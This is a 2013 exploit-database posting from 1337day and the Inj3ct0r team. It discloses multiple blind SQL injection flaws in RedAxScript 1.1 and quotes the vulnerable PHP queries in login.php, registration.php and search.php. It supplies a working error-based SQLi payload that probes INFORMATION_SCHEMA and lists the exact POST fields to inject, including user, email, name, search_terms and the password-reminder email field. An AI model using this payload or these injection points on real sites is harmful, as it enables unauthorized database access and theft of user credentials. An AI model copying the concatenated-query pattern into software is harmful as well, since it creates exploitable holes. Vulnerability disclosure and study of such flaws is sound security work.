RedAxScript 1.1 SQL Injection

`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[>] Title : RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities  
  
[>] Author : KedAns-Dz  
[+] E-mail : ked-h (@hotmail.com / @1337day.com)  
[+] FaCeb0ok : fb.me/Inj3ct0rK3d  
[+] TwiTter : @kedans  
  
[#] Platform : PHP / WebApp  
[+] Cat/Tag : Multiple , SQL Injection , Blind SQLi  
  
[<] <3 <3 Greetings t0 Palestine <3 <3  
  
- Blind SQL Injection ( 'POST' Query and 'GET' the full 'Information_Schema' ):  
AND (SELECT 8041 FROM(SELECT COUNT(*),CONCAT(0x3a6f79753a,(SELECT (CASE WHEN (8041=8041) THEN 1 ELSE 0 END)),0x3a70687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)  
  
- POST Inject via HTTP headers attack's or HTTP debugger, HackBar / or use any toolkit like sqlmap, sql-ninja etc..  
  
#### P.O.C [1] => in (login.php) | lines: ( 69 , 73.. 74) ##  
****  
$post_user = clean ($_POST['user'], 0);  
$users_query = 'SELECT id, name, user, email, password, language, status, groups FROM ' . PREFIX . 'users WHERE user = \'' . $post_user . '\'';   
mysql_query $users_result = mysql_query($users_query);   
****  
  
[+] POST Data on > : user=[ SQL Injection Here ]  
  
############################################################  
  
#### P.O.C [2] => in (registration.php) | lines: ( 59.. 62 , 142..156)  
****  
$r['email'] = clean ($_POST['email'], 3);  
$r['user'] = clean ($_POST['user'], 0);  
$r['name'] = clean ($_POST['name'], 0);   
****  
mysql_query mysql_query($query);   
$query = 'INSERT INTO ' . PREFIX . 'users (' . $key_string . ') VALUES (' . $value_string . ')';   
$key_string .= ', '; // if($last != $key),  
$key_string .= $key;   
foreach($r as $key=>$value)  
$value_string .= '\'' . $value . '\'';   
****  
  
[+] go to registration and POST Data on > : ( email, user, name ) =>  
email=-[ SQL Injection Here ]--&user=-[ SQL Injection Here ]--&name=-[ SQL Injection Here ]--  
  
############################################################  
  
#### P.O.C [3] => in (search.php) | lines: ( 47, 61, 70.. 82) ##  
****  
$search_terms = clean ($_POST['search_terms'], 1);  
****  
$query .= ')'; // if($search),  
$query .= ' || '; // if($search), if($last != $key),  
$query = 'SELECT id, title, alias, description, date, category, access FROM '...  
foreach($search as $key=>$value) // if($search),  
$search = array_filter(explode(' ', $search_terms));   
****  
mysql_query $result = mysql_query($query);   
$query .= ' ORDER BY date DESC LIMIT 50';   
****  
  
[+] in Search area : POST Data on ( search_terms )   
search_terms=[ SQL Injection Here ]  
  
#### && Other Bug/Vulnerability in (reminder.php) when u do remind passwd :p  
lines : ( 57 , & 80.. 85 )  
[+] POST Data on > : ( email=[ SQLi ] )  
  
## note : you can see befor any $_POST there is a function ' clean ' ( included clean.php )  
but blind sqli attacks still workin' ,the clean func replace u'r input to alpha-num output just it  
  
####  
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !>  
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>  
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database +>  
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *  
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **  
#---------------------------------------------------------------  
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,  
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,  
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &  
# & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , &  
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &  
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &  
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=  
####  
  
# 1337day.com id:[1337day-2013-21617]  
`